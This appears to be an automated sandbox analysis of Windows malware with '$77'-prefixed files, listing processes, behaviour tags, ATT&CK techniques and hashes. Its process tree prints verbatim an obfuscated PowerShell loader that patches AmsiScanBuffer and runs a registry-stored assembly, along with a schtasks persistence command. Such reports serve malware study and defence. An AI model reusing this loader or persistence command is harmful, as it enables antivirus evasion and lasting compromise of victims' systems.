1780 620 winlogon.exe 30 PID 620 wrote to memory of 1808 620 winlogon.exe 31 PID 620 wrote to memory of 2020 620 winlogon.exe 32 PID 620 wrote to memory of 2028 620 winlogon.exe 33 PID 620 wrote to memory of 2044 620 winlogon.exe 34 PID 620 wrote to memory of 1968 620 winlogon.exe 35 PID 620 wrote to memory of 1404 620 winlogon.exe 36 PID 620 wrote to memory of 2132 620 winlogon.exe 37 PID 620 wrote to memory of 2140 620 winlogon.exe 38 PID 620 wrote to memory of 2248 620 winlogon.exe 39 PID 620 wrote to memory of 2424 620 winlogon.exe 41 PID 620 wrote to memory of 2444 620 winlogon.exe 42 PID 620 wrote to memory of 2668 620 winlogon.exe 43 PID 620 wrote to memory of 2696 620 winlogon.exe 44 PID 620 wrote to memory of 2812 620 winlogon.exe 45 PID 620 wrote to memory of 2828 620 winlogon.exe 46 PID 620 wrote to memory of 2920 620 winlogon.exe 47 PID 620 wrote to memory of 2944 620 winlogon.exe 48 PID 620 wrote to memory of 2960 620 winlogon.exe 49 PID 620 wrote to memory of 2984 620 winlogon.exe 50 PID 620 wrote to memory of 3004 620 winlogon.exe 51 PID 620 wrote to memory of 3036 620 winlogon.exe 52 PID 620 wrote to memory of 3044 620 winlogon.exe 53 PID 620 wrote to memory of 3280 620 winlogon.exe 54 PID 620 wrote to memory of 3604 620 winlogon.exe 56 PID 620 wrote to memory of 3612 620 winlogon.exe 57 PID 620 wrote to memory of 3840 620 winlogon.exe 58 PID 620 wrote to memory of 688 620 winlogon.exe 60 PID 620 wrote to memory of 4204 620 winlogon.exe 62 PID 620 wrote to memory of 4424 620 winlogon.exe 63 PID 620 wrote to memory of 3648 620 winlogon.exe 66 PID 620 wrote to memory of 2736 620 winlogon.exe 67 PID 620 wrote to memory of 1624 620 winlogon.exe 68 PID 620 wrote to memory of 940 620 winlogon.exe 69 PID 620 wrote to memory of 3392 620 winlogon.exe 70 PID 620 wrote to memory of 3424 620 winlogon.exe 71 PID 620 wrote to memory of 3660 620 winlogon.exe 72 PID 620 wrote to memory of 2928 620 winlogon.exe 73 PID 620 wrote to memory of 3780 620 winlogon.exe 74 PID 620 wrote to memory of 4984 620 winlogon.exe 75 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1056
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1268 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:drsLNltgIyjN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nUyjAZyNMSIvML,[Parameter(Position=1)][Type]$VFmcFyQlEM)$ZCHqQCImkLT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+'D'+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+[Char](109)+'ory'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'Ty'+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'Seal'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'la'+'s'+'s',[MulticastDelegate]);$ZCHqQCImkLT.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+'e'+'c'+[Char](105)+''+'a'+''+'l'+'N'+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+'deBy'+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$nUyjAZyNMSIvML).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+'n'+'a'+'g'+'ed');$ZCHqQCImkLT.DefineMethod(''+'I'+''+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+'ir'+[Char](116)+''+'u'+''+'a'+'l',$VFmcFyQlEM,$nUyjAZyNMSIvML).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me,'+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $ZCHqQCImkLT.CreateType();}$ApEfeZRxEzclg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$KVzFSEmBZpuQWV=$ApEfeZRxEzclg.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'ic'+','+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OAjYnwOAJTuuOxoIoNH=drsLNltgIyjN @([String])([IntPtr]);$rLLXssqrEPIFvJajDjaGkK=drsLNltgIyjN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vKrfHxbyYNX=$ApEfeZRxEzclg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'odu'+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$FaKDMipRKJFQNf=$KVzFSEmBZpuQWV.Invoke($Null,@([Object]$vKrfHxbyYNX,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+'ib'+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+'A'+'')));$CMSqfoDroUfzkMVAr=$KVzFSEmBZpuQWV.Invoke($Null,@([Object]$vKrfHxbyYNX,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+'P'+'r'+[Char](111)+'t'+[Char](101)+''+'c'+''+'t'+'')));$RikRora=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FaKDMipRKJFQNf,$OAjYnwOAJTuuOxoIoNH).Invoke(''+'a'+'ms'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$DPCnGBfyZttfNGERw=$KVzFSEmBZpuQWV.Invoke($Null,@([Object]$RikRora,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+'e'+''+[Char](114)+'')));$OZvChSHpip=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CMSqfoDroUfzkMVAr,$rLLXssqrEPIFvJajDjaGkK).Invoke($DPCnGBfyZttfNGERw,[uint32]8,4,[ref]$OZvChSHpip);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](164-33),[Byte](90+145),[Byte](117-117),[Byte](76+108),[Byte](252-165),[Byte](253-253),[Byte](174-167),[Byte](99+29),[Byte](181-44),[Byte](130+80),[Byte](192+3),[Byte](2+129),[Byte](244-51),[Byte](251-251)),0,$DPCnGBfyZttfNGERw,55-41);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CMSqfoDroUfzkMVAr,$rLLXssqrEPIFvJajDjaGkK).Invoke($DPCnGBfyZttfNGERw,[uint32]8,0x20,[ref]$OZvChSHpip);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+'t'+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444
-
-
C:\Users\Public\$77Client.exe"C:\Users\Public\$77Client.exe"2⤵
- Executes dropped EXE
PID:2564
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1540
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2812
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2140
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2960
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:3036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:3044
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3280
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3604 -
C:\Users\Admin\AppData\Local\Temp\$77Test.exe"C:\Users\Admin\AppData\Local\Temp\$77Test.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Users\Public\$77Client.exe"C:\Users\Public\$77Client.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2780 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Client" /tr "C:\Users\Public\$77Client.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3836
-
-
-
-
C:\Users\Public\$77Installer.exe"C:\Users\Public\$77Installer.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2692
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3872
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:688
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4204
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1624
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:940
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:3660
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2928
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4984
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3056
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 529fc7517768e1eb7592277251fe67fc gOC82kUUcUuh4IjZeADP9Q.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:3640 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4832
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2100
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3144
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:4940
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4744
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2520
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5ba9ae105b867ac4e2b14a9d5091c32af
SHA1607307832893392f88729801a7fe98265363ceee
SHA2564bd5df1946d35c832d9ceecac1f72d982dda9594741794cfd8bd1f7220350ef4
SHA512ac4361d7bf480c91dd530768997762604a10d19449f324b34c7376a04da861f5477abd20ab5459afc940eedd6cb997ed69ced99d946a8c26899647d24f832251
-
Filesize
163KB
MD5f3b37711b4fdccff04ac73db511e6c97
SHA125a1e189231ff7b4c660ddb2bec4e57bbee61ef8
SHA256bbf19ab2cea14f070e7462babcc0f86ee9499ac0e971f70471386e43cf11cdd0
SHA512e25d7e968a2aff5c088d308be90a5f162b0c1a5a77b4914a70513d64da817c2565bb49890070d870add94c42b73ddecff467fe5ee71eeb1b6f49f6a9918ba786
-
Filesize
3KB
MD5c6086d02f8ce044f5fa07a98303dc7eb
SHA16116247e9d098b276b476c9f4c434f55d469129c
SHA2568901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA5121876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize
3KB
MD539b9eb9d1a56bc1792c844c425bd1dec
SHA1db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392
-
Filesize
2KB
MD54ac1741ceb19f5a983079b2c5f344f5d
SHA1f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA2567df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82